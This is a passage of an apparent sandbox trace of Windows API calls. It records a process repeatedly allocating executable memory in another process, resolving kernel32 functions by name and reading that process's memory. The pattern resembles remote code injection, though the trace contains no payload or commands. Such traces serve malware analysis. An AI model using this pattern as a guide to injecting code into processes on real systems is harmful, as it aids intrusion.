[0176.736] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.736] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb40 [0176.736] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.737] ResetEvent (hEvent=0x580) returned 1 [0176.737] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.737] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.737] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.737] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cb40 | out: hHeap=0x2150000) returned 1 [0176.737] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.739] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.739] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.739] lstrlenA (lpString="InterlockedFlushSList") returned 21 [0176.739] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.740] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.740] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0176.740] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.740] ResetEvent (hEvent=0x580) returned 1 [0176.740] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.741] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.741] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.741] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cab0 | out: hHeap=0x2150000) returned 1 [0176.741] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.742] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.743] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.743] lstrlenA (lpString="EncodePointer") returned 13 [0176.743] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.743] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.743] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.743] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.744] ResetEvent (hEvent=0x580) returned 1 [0176.744] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.744] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.744] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.744] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.744] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.746] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.746] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.746] lstrlenA (lpString="InitializeCriticalSectionAndSpinCount") returned 37 [0176.746] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x26, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.746] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.746] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9c0 [0176.746] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.747] ResetEvent (hEvent=0x580) returned 1 [0176.747] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.747] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.747] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.748] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c9c0 | out: hHeap=0x2150000) returned 1 [0176.748] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.749] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.749] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.749] lstrlenA (lpString="TlsAlloc") returned 8 [0176.749] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.750] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.750] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c750 [0176.750] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.750] ResetEvent (hEvent=0x580) returned 1 [0176.750] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.751] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.751] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.751] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c750 | out: hHeap=0x2150000) returned 1 [0176.751] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.753] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.753] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.753] lstrlenA (lpString="TlsGetValue") returned 11 [0176.753] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.753] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.753] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cbd0 [0176.753] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.754] ResetEvent (hEvent=0x580) returned 1 [0176.754] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.754] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.754] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.754] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cbd0 | out: hHeap=0x2150000) returned 1 [0176.754] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.756] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.756] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.756] lstrlenA (lpString="TlsSetValue") returned 11 [0176.756] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.756] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.757] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ca20 [0176.757] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.757] ResetEvent (hEvent=0x580) returned 1 [0176.757] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.757] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.757] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.758] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ca20 | out: hHeap=0x2150000) returned 1 [0176.758] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.759] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.759] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.759] lstrlenA (lpString="TlsFree") returned 7 [0176.759] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.759] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.760] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cde0 [0176.760] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.760] ResetEvent (hEvent=0x580) returned 1 [0176.760] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.762] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.762] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.763] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cde0 | out: hHeap=0x2150000) returned 1 [0176.763] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.764] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.764] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.764] lstrlenA (lpString="LoadLibraryExW") returned 14 [0176.764] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.765] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.765] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.765] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.765] ResetEvent (hEvent=0x580) returned 1 [0176.765] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.766] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.766] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.767] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.767] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.768] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.768] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.768] lstrlenA (lpString="GetCurrentProcess") returned 17 [0176.768] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.769] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.769] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cbd0 [0176.769] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.769] ResetEvent (hEvent=0x580) returned 1 [0176.769] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.770] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.770] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.770] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cbd0 | out: hHeap=0x2150000) returned 1 [0176.770] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.771] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.771] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.771] lstrlenA (lpString="TerminateProcess") returned 16 [0176.771] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.772] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.772] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.772] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.773] ResetEvent (hEvent=0x580) returned 1 [0176.773] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.773] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.773] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.773] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.773] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.775] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.775] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.775] lstrlenA (lpString="ExitThread") returned 10 [0176.775] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.775] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.775] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0176.776] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.776] ResetEvent (hEvent=0x580) returned 1 [0176.776] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.776] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.776] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.777] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0176.777] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.778] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.778] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.778] lstrlenA (lpString="FreeLibraryAndExitThread") returned 24 [0176.778] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.779] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.779] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c930 [0176.779] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.780] ResetEvent (hEvent=0x580) returned 1 [0176.780] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.780] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.780] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.780] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c930 | out: hHeap=0x2150000) returned 1 [0176.780] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.782] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.782] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.782] lstrlenA (lpString="GetModuleHandleExW") returned 18 [0176.782] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.783] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.783] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c930 [0176.783] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.784] ResetEvent (hEvent=0x580) returned 1 [0176.784] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.784] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.784] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.784] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c930 | out: hHeap=0x2150000) returned 1 [0176.784] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.786] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.786] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.786] lstrlenA (lpString="ExitProcess") returned 11 [0176.786] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.786] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.787] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c780 [0176.787] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.787] ResetEvent (hEvent=0x580) returned 1 [0176.787] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.787] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.787] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.788] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c780 | out: hHeap=0x2150000) returned 1 [0176.788] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.789] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.789] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.789] lstrlenA (lpString="GetModuleFileNameA") returned 18 [0176.789] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.790] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.790] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0176.790] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.791] ResetEvent (hEvent=0x580) returned 1 [0176.791] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.791] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.791] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.791] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0176.791] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.792] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.793] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.793] lstrlenA (lpString="GetACP") returned 6 [0176.793] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.793] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.793] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c3f0 [0176.793] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.794] ResetEvent (hEvent=0x580) returned 1 [0176.794] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.794] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, 